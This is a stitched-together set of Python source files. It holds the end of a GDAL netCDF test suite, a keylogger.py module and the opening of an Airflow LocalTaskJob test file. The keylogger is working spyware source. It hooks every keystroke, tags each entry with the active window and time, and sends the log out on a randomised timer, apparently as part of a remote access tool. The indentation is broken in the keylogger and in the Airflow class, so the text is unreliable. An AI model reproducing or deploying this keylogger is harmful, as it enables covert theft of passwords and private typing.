    ds = gdal.VectorTranslate( 'tmp/netcdf_63.nc', 'data/profile.nc', format = 'netCDF', datasetCreationOptions = ['FORMAT=NC4'], layerCreationOptions = ['FEATURE_TYPE=PROFILE', 'USE_STRING_IN_NC4=NO', 'STRING_DEFAULT_WIDTH=1' ] )
    gdal.VectorTranslate( '/vsimem/netcdf_63.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
    # Fix: initialize so a failed VSIFOpenL yields a clean 'fail', not NameError.
    content = None
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_63.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'
    gdal.Unlink('/vsimem/netcdf_63.csv')
    return 'success'
def netcdf_63_ncdump_check():
    """Inspect tmp/netcdf_63.nc with ncdump; skip when ncdump is unavailable."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    # Probe for ncdump (if available); any failure to launch it means "absent".
    try:
        (ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
    except Exception:  # fix: was a bare except, which also swallowed SystemExit
        err = None
    if err is not None and 'netcdf library version' in err:
        (ret, err) = gdaltest.runexternal_out_and_err( 'ncdump -h tmp/netcdf_63.nc' )
        if ret.find('profile = UNLIMITED') < 0 or \
           ret.find('record = UNLIMITED') < 0 or \
           ret.find('profile:cf_role = "profile_id"') < 0 or \
           ret.find('parentIndex:instance_dimension = "profile"') < 0 or \
           ret.find(':featureType = "profile"') < 0 or \
           ret.find('char station(record') < 0:
            gdaltest.post_reason('failure')
            print(ret)
            return 'fail'
    else:
        # Fix: was gdal.Unlink('/vsimem/netcdf_63.nc'), a path that never
        # existed; the file created by netcdf_63() lives in tmp/.
        gdal.Unlink('tmp/netcdf_63.nc')
        return 'skip'
    gdal.Unlink('tmp/netcdf_63.nc')  # fix: same wrong /vsimem path as above
    return 'success'
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# but without a profile field.
def netcdf_64():
    """Create an indexed-ragged-array profile file without a 'profile' field.

    The writer must then synthesize the profile dimension (named via
    PROFILE_DIM_NAME) and expose it as a 0-based field on read-back.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    gdal.VectorTranslate( 'tmp/netcdf_64.nc', 'data/profile.nc', format = 'netCDF', selectFields = ['id,station,foo'], layerCreationOptions = ['FEATURE_TYPE=PROFILE', 'PROFILE_DIM_NAME=profile_dim', 'PROFILE_DIM_INIT_SIZE=1'] )
    gdal.VectorTranslate( '/vsimem/netcdf_64.csv', 'tmp/netcdf_64.nc', format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
    # Fix: initialize so a failed VSIFOpenL yields a clean 'fail', not NameError.
    content = None
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_64.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,profile_dim,id,station,foo
"POINT Z (2 49 100)",0,1,Palo Alto,bar
"POINT Z (3 50 50)",1,2,Santa Fe,baz
"POINT Z (2 49 200)",0,3,Palo Alto,baw
"POINT Z (3 50 100)",1,4,Santa Fe,baz2
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'
    gdal.Unlink('/vsimem/netcdf_64.csv')
    # Fix: was gdal.Unlink('/vsimem/netcdf_64.nc'), a path that never existed;
    # the file created above lives in tmp/.
    gdal.Unlink('tmp/netcdf_64.nc')
    return 'success'
###############################################################################
# Test creating a NC4 file with empty string fields / WKT fields
# (they must be filled as empty strings to avoid crashes in netcdf lib)
def netcdf_65():
    """NC4 with an unset string field: it must round-trip as '' (netcdf lib
    crashes on genuinely NULL strings, so the driver writes empty ones)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    out_ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_65.nc', options = ['FORMAT=NC4'])
    out_lyr = out_ds.CreateLayer('test')
    out_lyr.CreateField(ogr.FieldDefn('str', ogr.OFTString))
    # Feature created with the 'str' field deliberately left unset.
    out_lyr.CreateFeature(ogr.Feature(out_lyr.GetLayerDefn()))
    out_ds = None
    in_ds = ogr.Open('tmp/netcdf_65.nc')
    feat = in_ds.GetLayer(0).GetNextFeature()
    if feat['str'] != '':
        gdaltest.post_reason('failure')
        feat.DumpReadable()
        return 'fail'
    in_ds = None
    gdal.Unlink('tmp/netcdf_65.nc')
    return 'success'
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# from a config file
def netcdf_66():
    """Create an indexed-ragged-array profile file driven by the CONFIG_FILE
    dataset creation option; first with broken configs (must not crash),
    then with a valid one whose renames must be visible on read-back.

    tmp/netcdf_66.nc is left on disk for netcdf_66_ncdump_check().
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # First trying with no so good configs
    with gdaltest.error_handler():
        gdal.VectorTranslate( 'tmp/netcdf_66.nc', 'data/profile.nc', format = 'netCDF', datasetCreationOptions = ['CONFIG_FILE=not_existing'] )
    with gdaltest.error_handler():
        gdal.VectorTranslate( 'tmp/netcdf_66.nc', 'data/profile.nc', format = 'netCDF', datasetCreationOptions = ['CONFIG_FILE=<Configuration>'] )
    # Every element below is malformed or unknown in some way: the driver
    # must warn/ignore but still produce a file.
    myconfig = \
"""<Configuration>
<!-- comment -->
<unrecognized_elt/>
<DatasetCreationOption/>
<DatasetCreationOption name="x"/>
<DatasetCreationOption value="x"/>
<LayerCreationOption/>
<LayerCreationOption name="x"/>
<LayerCreationOption value="x"/>
<Attribute/>
<Attribute name="foo"/>
<Attribute value="foo"/>
<Attribute name="foo" value="bar" type="unsupported"/>
<Field/>
<Field name="x">
<!-- comment -->
<unrecognized_elt/>
</Field>
<Field name="station" main_dim="non_existing"/>
<Layer/>
<Layer name="x">
<!-- comment -->
<unrecognized_elt/>
<LayerCreationOption/>
<LayerCreationOption name="x"/>
<LayerCreationOption value="x"/>
<Attribute/>
<Attribute name="foo"/>
<Attribute value="foo"/>
<Attribute name="foo" value="bar" type="unsupported"/>
<Field/>
</Layer>
</Configuration>
"""
    with gdaltest.error_handler():
        gdal.VectorTranslate( 'tmp/netcdf_66.nc', 'data/profile.nc', format = 'netCDF', datasetCreationOptions = ['CONFIG_FILE=' + myconfig] )
    # Now with a correct configuration
    myconfig = \
"""<Configuration>
<DatasetCreationOption name="WRITE_GDAL_TAGS" value="NO"/>
<LayerCreationOption name="STRING_DEFAULT_WIDTH" value="1"/>
<Attribute name="foo" value="bar"/>
<Attribute name="foo2" value="bar2"/>
<Field name="id">
<Attribute name="my_extra_attribute" value="5.23" type="double"/>
</Field>
<Field netcdf_name="lon"> <!-- edit predefined variable -->
<Attribute name="my_extra_lon_attribute" value="foo"/>
</Field>
<Layer name="profile" netcdf_name="my_profile">
<LayerCreationOption name="FEATURE_TYPE" value="PROFILE"/>
<LayerCreationOption name="RECORD_DIM_NAME" value="obs"/>
<Attribute name="foo" value="123" type="integer"/> <!-- override global one -->
<Field name="station" netcdf_name="my_station" main_dim="obs">
<Attribute name="long_name" value="my station attribute"/>
</Field>
<Field netcdf_name="lat"> <!-- edit predefined variable -->
<Attribute name="long_name" value=""/> <!-- remove predefined attribute -->
</Field>
</Layer>
</Configuration>
"""
    gdal.VectorTranslate( 'tmp/netcdf_66.nc', 'data/profile.nc', format = 'netCDF', datasetCreationOptions = ['CONFIG_FILE=' + myconfig] )
    gdal.VectorTranslate( '/vsimem/netcdf_66.csv', 'tmp/netcdf_66.nc', format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
    # NOTE(review): 'content' is unbound (NameError) if VSIFOpenL fails;
    # this relies on the open always succeeding — confirm/initialize.
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_66.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    # The 'station' field must appear under its renamed 'my_station' header.
    expected_content = """WKT,profile,id,my_station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'
    gdal.Unlink('/vsimem/netcdf_66.csv')
    return 'success'
def netcdf_66_ncdump_check():
    """Verify the renames/attributes netcdf_66() configured via CONFIG_FILE,
    using ncdump; skip when ncdump is unavailable."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # Probe for ncdump (if available); any failure to launch it means "absent".
    try:
        (ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
    except Exception:  # fix: was a bare except, which also swallowed SystemExit
        err = None
    if err is not None and 'netcdf library version' in err:
        (ret, err) = gdaltest.runexternal_out_and_err( 'ncdump -h tmp/netcdf_66.nc' )
        if ret.find('char my_station(obs, my_station_max_width)') < 0 or \
           ret.find('my_station:long_name = "my station attribute"') < 0 or \
           ret.find('lon:my_extra_lon_attribute = "foo"') < 0 or \
           ret.find('lat:long_name') >= 0 or \
           ret.find('id:my_extra_attribute = 5.23') < 0 or \
           ret.find('profile:cf_role = "profile_id"') < 0 or \
           ret.find('parentIndex:instance_dimension = "profile"') < 0 or \
           ret.find(':featureType = "profile"') < 0:
            gdaltest.post_reason('failure')
            print(ret)
            return 'fail'
    else:
        # Fix: was gdal.Unlink('/vsimem/netcdf_66.nc'), a path that never
        # existed; the file created by netcdf_66() lives in tmp/.
        gdal.Unlink('tmp/netcdf_66.nc')
        return 'skip'
    gdal.Unlink('tmp/netcdf_66.nc')  # fix: same wrong /vsimem path as above
    return 'success'
###############################################################################
# ticket #5950: optimize IReadBlock() and CheckData() handling of partial
# blocks in the x axischeck for partial block reading.
def netcdf_67():
    """Partial-block handling along the x axis (#5950): IReadBlock()/CheckData()
    must reconstruct the full 3x3 image correctly."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    try:
        import numpy
    except ImportError:  # fix: was a bare except, which hid unrelated errors
        return 'skip'
    # disable bottom-up mode to use the real file's blocks size
    gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', 'NO' )
    # A check_stat-based test does not work here: the last pixel (9) is not
    # reflected in the computed statistics, so compare the full image instead:
    #   tst = gdaltest.GDALTest( 'NetCDF', 'partial_block_ticket5950.nc', 1, 45 )
    #   result = tst.testOpen( check_stat=(1, 9, 5, 2.582) )
    ds = gdal.Open( 'data/partial_block_ticket5950.nc', gdal.GA_ReadOnly )
    ref = numpy.arange(1, 10).reshape((3, 3))
    if numpy.array_equal(ds.GetRasterBand(1).ReadAsArray(), ref):
        result = 'success'
    else:
        result = 'fail'
    ds = None
    # Restore the default bottom-up behaviour for subsequent tests.
    gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', None )
    return result
###############################################################################
# Test reading SRS from srid attribute (#6613)
def netcdf_68():
    """SRS must be read from the 'srid' attribute (#6613)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    wkt = gdal.Open('data/srid.nc').GetProjectionRef()
    # srid points at EPSG:6933; the authority code must surface in the WKT.
    if wkt.find('6933') < 0:
        gdaltest.post_reason('failure')
        print(wkt)
        return 'fail'
    return 'success'
###############################################################################
# Test opening a dataset with a 1D variable with 0 record (#6645)
def netcdf_69():
    """Opening a dataset whose 1D variable has 0 records must not fail (#6645)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    return 'success' if gdal.Open('data/test6645.nc') is not None else 'fail'
###############################################################################
# Test that we don't erroneously identify non-longitude axis as longitude (#6759)
def netcdf_70():
    """A non-longitude axis must not be mis-identified as longitude (#6759)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    gt = gdal.Open('data/test6759.nc').GetGeoTransform()
    expected_gt = [304250.0, 250.0, 0.0, 4952500.0, 0.0, -250.0]
    if max(abs(got - want) for got, want in zip(gt, expected_gt)) > 1e-3:
        print(gt)
        return 'fail'
    return 'success'
###############################################################################
# Test that we take into account x and y offset and scaling
# (https://github.com/OSGeo/gdal/pull/200)
def netcdf_71():
    """x/y coordinate scale/offset must be applied to the geotransform
    (https://github.com/OSGeo/gdal/pull/200)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    gt = gdal.Open('data/test_coord_scale_offset.nc').GetGeoTransform()
    expected_gt = (-690769.999174516, 1015.8812500000931, 0.0, 2040932.1838741193, 0.0, 1015.8812499996275)
    if max(abs(got - want) for got, want in zip(gt, expected_gt)) > 1e-3:
        print(gt)
        return 'fail'
    return 'success'
###############################################################################
# test int64 attributes / dim
def netcdf_72():
    """int64 attribute/dimension values must survive as band metadata (NC4)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    time_value = gdal.Open('data/int64dim.nc').GetRasterBand(1).GetMetadataItem('NETCDF_DIM_TIME')
    if time_value != '123456789012':
        print(time_value)
        return 'fail'
    return 'success'
###############################################################################
# test geostationary with radian units (https://github.com/OSGeo/gdal/pull/220)
def netcdf_73():
    """Geostationary projection with radian units
    (https://github.com/OSGeo/gdal/pull/220)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    gt = gdal.Open('data/geos_rad.nc').GetGeoTransform()
    expected_gt = (-5979486.362104082, 1087179.4077774752, 0.0, -5979487.123448145, 0.0, 1087179.4077774752)
    # Tolerance of 1 m: values are in the millions, small float drift is fine.
    if max(abs(got - want) for got, want in zip(gt, expected_gt)) > 1:
        print(gt)
        return 'fail'
    return 'success'
###############################################################################
# test geostationary with microradian units (https://github.com/OSGeo/gdal/pull/220)
def netcdf_74():
    """Geostationary projection with microradian units
    (https://github.com/OSGeo/gdal/pull/220)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    gt = gdal.Open('data/geos_microradian.nc').GetGeoTransform()
    expected_gt = (-5739675.119757546, 615630.8078590936, 0.0, -1032263.7666924844, 0.0, 615630.8078590936)
    # Tolerance of 1 m: values are in the millions, small float drift is fine.
    if max(abs(got - want) for got, want in zip(gt, expected_gt)) > 1:
        print(gt)
        return 'fail'
    return 'success'
###############################################################################
# test opening a ncdump file
def netcdf_75():
    """Open a raster ncdump text dump (.nc.txt); only runs on builds
    compiled with ENABLE_NCDUMP support."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if gdaltest.netcdf_drv.GetMetadataItem("ENABLE_NCDUMP") != 'YES':
        return 'skip'
    tst = gdaltest.GDALTest( 'NetCDF', 'byte.nc.txt',
                             1, 4672 )
    # Expected SRS: NAD27 / UTM zone 11N (EPSG:26711).
    wkt = """PROJCS["NAD27 / UTM zone 11N",
GEOGCS["NAD27",
DATUM["North_American_Datum_1927",
SPHEROID["Clarke 1866",6378206.4,294.9786982139006,
AUTHORITY["EPSG","7008"]],
AUTHORITY["EPSG","6267"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4267"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",-117],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AUTHORITY["EPSG","26711"]]"""
    return tst.testOpen( check_prj = wkt )
###############################################################################
# test opening a vector ncdump file
def netcdf_76():
    """Open a vector ncdump text dump (.nc.txt); only runs on builds
    compiled with ENABLE_NCDUMP support."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if gdaltest.netcdf_drv.GetMetadataItem("ENABLE_NCDUMP") != 'YES':
        return 'skip'
    ds = ogr.Open('data/poly.nc.txt')
    lyr = ds.GetLayer(0)
    f = lyr.GetNextFeature()
    if f is None or f.GetGeometryRef() is None:
        # Fix: DumpReadable() was called unconditionally, raising
        # AttributeError (instead of a clean 'fail') when f is None.
        if f is not None:
            f.DumpReadable()
        return 'fail'
    return 'success'
###############################################################################
# test opening a raster file that used to be confused with a vector file (#6974)
def netcdf_77():
    """Raster file that used to be mis-detected as a vector file (#6974)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    subdatasets = gdal.Open('data/fake_Oa01_radiance.nc').GetMetadata('SUBDATASETS')
    # Two subdatasets, each described by a NAME/DESC metadata pair.
    if len(subdatasets) != 2 * 2:
        gdaltest.post_reason('fail')
        print(subdatasets)
        return 'fail'
    band_ds = gdal.Open('NETCDF:"data/fake_Oa01_radiance.nc":Oa01_radiance')
    # The subdataset must not carry any geolocation metadata.
    if len(band_ds.GetMetadata('GEOLOCATION')) != 0:
        gdaltest.post_reason('fail')
        return 'fail'
    return 'success'
###############################################################################
# test we handle correctly valid_range={0,255} for a byte dataset with
# negative nodata value
def netcdf_78():
    """valid_range={0,255} on a Byte dataset with a negative nodata value:
    nodata must map to 240 and the pixel values must be read unsigned."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    ds = gdal.Open('data/byte_with_valid_range.nc')
    band = ds.GetRasterBand(1)
    if band.GetNoDataValue() != 240:
        gdaltest.post_reason('fail')
        return 'fail'
    pixels = struct.unpack('B' * 4, band.ReadRaster())
    if pixels != (128, 129, 126, 127):
        gdaltest.post_reason('fail')
        print(pixels)
        return 'fail'
    return 'success'
###############################################################################
# test we handle correctly _Unsigned="true" for a byte dataset with
# negative nodata value
def netcdf_79():
    """_Unsigned="true" on a Byte dataset with a negative _FillValue:
    nodata must map to 240 and the pixel values must be read unsigned."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    ds = gdal.Open('data/byte_with_neg_fillvalue_and_unsigned_hint.nc')
    band = ds.GetRasterBand(1)
    if band.GetNoDataValue() != 240:
        gdaltest.post_reason('fail')
        return 'fail'
    pixels = struct.unpack('B' * 4, band.ReadRaster())
    if pixels != (128, 129, 126, 127):
        gdaltest.post_reason('fail')
        print(pixels)
        return 'fail'
    return 'success'
###############################################################################
# Test creating and opening with accent
def netcdf_80():
    """CreateCopy to, and reopen of, a filename containing an accent."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    accented_copy = gdaltest.GDALTest( 'NETCDF', '../data/byte.tif', 1, 4672 )
    return accented_copy.testCreateCopy(new_filename = 'test\xc3\xa9.nc', check_gt=0, check_srs=0, check_minmax = 0)
###############################################################################
# netCDF file in rotated_pole projection
def netcdf_81():
    """netCDF file in rotated_pole projection: check size, SRS and geotransform."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    ds = gdal.Open('data/rotated_pole.nc')
    if ds.RasterXSize != 137 or ds.RasterYSize != 108:
        gdaltest.post_reason('Did not get expected dimensions')
        print(ds.RasterXSize)
        print(ds.RasterYSize)
        return 'fail'
    projection = ds.GetProjectionRef()
    # Rotated pole is carried via a PROJ4 EXTENSION node in the WKT.
    expected_projection = """PROJCS["unnamed",GEOGCS["unknown",DATUM["unknown",SPHEROID["Spheroid",6367470,594.3130483479559]],PRIMEM["Greenwich",0],UNIT["degree",0.0174532925199433]],PROJECTION["Rotated_pole"],EXTENSION["PROJ4","+proj=ob_tran +o_proj=longlat +lon_0=18 +o_lon_p=0 +o_lat_p=39.25 +a=6367470 +b=6367470 +to_meter=0.0174532925199 +wktext"]]"""
    if projection != expected_projection:
        gdaltest.post_reason('Did not get expected projection')
        print(projection)
        return 'fail'
    gt = ds.GetGeoTransform()
    expected_gt = (-35.47, 0.44, 0.0, 23.65, 0.0, -0.44)
    if max([abs(gt[i] - expected_gt[i]) for i in range(6)]) > 1e-3:
        gdaltest.post_reason('Did not get expected geotransform')
        print(gt)
        return 'fail'
    return 'success'
###############################################################################
# netCDF file with extra dimensions that are oddly indexed (1D variable
# corresponding to the dimension but with a differentn ame, no corresponding
# 1D variable, several corresponding variables)
def netcdf_82():
    """Extra dimensions that are oddly indexed: a 1D variable with a different
    name than its dimension, a dimension with no corresponding variable, and
    a dimension with several candidate variables."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # Opening emits warnings about the odd indexing; swallow them.
    with gdaltest.error_handler():
        ds = gdal.Open('data/oddly_indexed_extra_dims.nc')
    md = ds.GetMetadata()
    # Only the dimension with an unambiguous (differently named) variable
    # gets _VALUES/_DEF entries; the others appear only in NETCDF_DIM_EXTRA.
    expected_md = {
        'NETCDF_DIM_extra_dim_with_var_of_different_name_VALUES': '{100,200}',
        'NETCDF_DIM_EXTRA': '{extra_dim_with_several_variables,extra_dim_without_variable,extra_dim_with_var_of_different_name}',
        'x#standard_name': 'projection_x_coordinate',
        'NC_GLOBAL#Conventions': 'CF-1.5',
        'y#standard_name': 'projection_y_coordinate',
        'NETCDF_DIM_extra_dim_with_var_of_different_name_DEF': '{2,6}'
    }
    if md != expected_md:
        gdaltest.post_reason('Did not get expected metadata')
        print(md)
        return 'fail'
    md = ds.GetRasterBand(1).GetMetadata()
    expected_md = {
        'NETCDF_DIM_extra_dim_with_several_variables': '1',
        'NETCDF_DIM_extra_dim_with_var_of_different_name': '100',
        'NETCDF_DIM_extra_dim_without_variable': '1',
        'NETCDF_VARNAME': 'data'
    }
    if md != expected_md:
        gdaltest.post_reason('Did not get expected metadata')
        print(md)
        return 'fail'
    return 'success'
###############################################################################
###############################################################################
# main tests list
# Ordered list of every test function, handed to gdaltest.run_tests() below.
gdaltest_list = [
    netcdf_1,
    netcdf_2,
    netcdf_3,
    netcdf_4,
    netcdf_5,
    netcdf_6,
    netcdf_7,
    netcdf_8,
    netcdf_9,
    netcdf_10,
    netcdf_11,
    netcdf_12,
    netcdf_13,
    netcdf_14,
    netcdf_15,
    netcdf_16,
    netcdf_17,
    netcdf_18,
    netcdf_19,
    netcdf_20,
    netcdf_21,
    netcdf_22,
    netcdf_23,
    netcdf_24,
    netcdf_25,
    netcdf_26,
    netcdf_27,
    netcdf_28,
    netcdf_29,
    netcdf_30,
    netcdf_31,
    netcdf_32,
    netcdf_33,
    netcdf_34,
    netcdf_35,
    netcdf_36,
    netcdf_37,
    netcdf_38,
    netcdf_39,
    netcdf_40,
    netcdf_41,
    netcdf_42,
    netcdf_43,
    netcdf_44,
    netcdf_45,
    netcdf_46,
    netcdf_47,
    netcdf_48,
    netcdf_49,
    netcdf_50,
    netcdf_51,
    netcdf_51_no_gdal_tags,
    netcdf_52,
    netcdf_53,
    netcdf_54,
    netcdf_55,
    netcdf_56,
    netcdf_57,
    netcdf_58,
    netcdf_59,
    netcdf_60,
    netcdf_61,
    # The ncdump/cf checks must run directly after the test that created
    # the tmp/ file they inspect.
    netcdf_62,
    netcdf_62_ncdump_check,
    netcdf_62_cf_check,
    netcdf_63,
    netcdf_63_ncdump_check,
    netcdf_64,
    netcdf_65,
    netcdf_66,
    netcdf_66_ncdump_check,
    netcdf_67,
    netcdf_68,
    netcdf_69,
    netcdf_70,
    netcdf_71,
    netcdf_72,
    netcdf_73,
    netcdf_74,
    netcdf_75,
    netcdf_76,
    netcdf_77,
    netcdf_78,
    netcdf_79,
    netcdf_80,
    netcdf_81,
    netcdf_82
]
###############################################################################
# basic file creation tests
# Per-pixel-type creation fixtures: (filename, band, checksum, _unused, options).
init_list = [ \
    ('byte.tif', 1, 4672, None, []),
    ('byte_signed.tif', 1, 4672, None, ['PIXELTYPE=SIGNEDBYTE']),
    ('int16.tif', 1, 4672, None, []),
    ('int32.tif', 1, 4672, None, []),
    ('float32.tif', 1, 4672, None, []),
    ('float64.tif', 1, 4672, None, [])
]
# Some tests we don't need to do for each type.
item = init_list[0]
ut = gdaltest.GDALTest( 'netcdf', item[0], item[1], item[2], options=item[4] )
#test geotransform and projection
gdaltest_list.append( (ut.testSetGeoTransform, item[0]) )
gdaltest_list.append( (ut.testSetProjection, item[0]) )
#SetMetadata() not supported
#gdaltest_list.append( (ut.testSetMetadata, item[0]) )
# gdaltest_list = [ netcdf_1, netcdf_82 ]
# Others we do for each pixel type.
for item in init_list:
    ut = gdaltest.GDALTest( 'netcdf', item[0], item[1], item[2], options=item[4] )
    # NOTE(review): apparent dead branch — the constructor just ran, so ut
    # cannot be None here; the message mentions GTiff in a netCDF test
    # (looks copy-pasted) and there is no 'continue', so the appends below
    # would run regardless. Confirm intent.
    if ut is None:
        print( 'GTiff tests skipped' )
    gdaltest_list.append( (ut.testCreateCopy, item[0]) )
    gdaltest_list.append( (ut.testCreate, item[0]) )
    gdaltest_list.append( (ut.testSetNoDataValue, item[0]) )
###############################################################################
# other tests
if __name__ == '__main__':
    # Standard gdaltest driver: register the run, execute every test in
    # gdaltest_list, clean up tmp/, then print the summary.
    gdaltest.setup_run( 'netcdf' )
    gdaltest.run_tests( gdaltest_list )
    #make sure we cleanup
    gdaltest.clean_tmp()
    gdaltest.summarize()
|
keylogger.py | import requests
import time
from threading import Thread
import pythoncom
import pyHook
import utils
from random import randint
from time import sleep
started = False
keylog = ""
current_window = ""
def OnKeyboardEvent(event):
global current_window
global keylog
if current_window != event.WindowName:
current_window = event.WindowName
keylog += "\n[%s] @@ %s|||" % (current_window, time.ctime())
key = ""
if event.Ascii == 27:
key = '[ESC]'
elif event.Ascii == 13:
key = "\n"
elif event.Ascii:
key = chr(event.Ascii)
keylog += key
return True
def keylogger():
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
def update():
global keylog
while True:
utils.send_output("{{KEYLOGS}}"+keylog)
delay = randint(60,120)
time.sleep(delay)
def run(action):
global started
global keylog
if action == "start":
if not started:
klg = Thread(target=keylogger)
klg.setDaemon(True)
klg.start()
updater = Thread(target=update)
updater.setDaemon(True)
updater.start()
started = True
else:
pass
elif action == "update":
# Storing Keystrokes
utils.send_output("{{KEYLOGS}}"+keylog)
|
test_local_task_job.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import os
import signal
import time
import uuid
from datetime import timedelta
from multiprocessing import Lock, Value
from unittest import mock
from unittest.mock import patch
import pytest
from airflow import settings
from airflow.exceptions import AirflowException, AirflowFailException
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.jobs.scheduler_job import SchedulerJob
from airflow.models.dagbag import DagBag
from airflow.models.taskinstance import TaskInstance
from airflow.operators.dummy import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
from airflow.utils import timezone
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.types import DagRunType
from tests.test_utils import db
from tests.test_utils.asserts import assert_queries_count
from tests.test_utils.config import conf_vars
from tests.test_utils.mock_executor import MockExecutor
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TEST_DAG_FOLDER = os.environ['AIRFLOW__CORE__DAGS_FOLDER']
@pytest.fixture
def clear_db():
    """Function-scoped fixture: wipe DAG/job/run/task-fail tables before each test."""
    for wipe in (db.clear_db_dags, db.clear_db_jobs, db.clear_db_runs, db.clear_db_task_fail):
        wipe()
    yield
@pytest.fixture(scope='class')
def clear_db_class():
    """Class-scoped fixture: wipe DAG/job/run/task-fail tables once after the class."""
    yield
    for wipe in (db.clear_db_dags, db.clear_db_jobs, db.clear_db_runs, db.clear_db_task_fail):
        wipe()
@pytest.fixture(scope='module')
def dagbag():
    """Module-scoped DagBag over the test DAG folder, with examples excluded."""
    return DagBag(dag_folder=TEST_DAG_FOLDER, include_examples=False)
@pytest.mark.usefixtures('clear_db_class', 'clear_db')
class TestLocalTaskJob:
    @pytest.fixture(autouse=True)
    def set_instance_attrs(self, dagbag):
        """Autouse fixture: share the module DagBag and patch base_job.sleep
        for the duration of every test in this class."""
        self.dagbag = dagbag
        # The mock is stored on the instance so individual tests can set
        # side effects on it (e.g. test_heartbeat_failed_fast).
        with patch('airflow.jobs.base_job.sleep') as self.mock_base_job_sleep:
            yield
def validate_ti_states(self, dag_run, ti_state_mapping, error_message):
for task_id, expected_state in ti_state_mapping.items():
task_instance = dag_run.get_task_instance(task_id=task_id)
task_instance.refresh_from_db()
assert task_instance.state == expected_state, error_message
def test_localtaskjob_essential_attr(self, dag_maker):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
with dag_maker('test_localtaskjob_essential_attr'):
op1 = DummyOperator(task_id='op1')
dr = dag_maker.create_dagrun()
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
assert all(check_result_1)
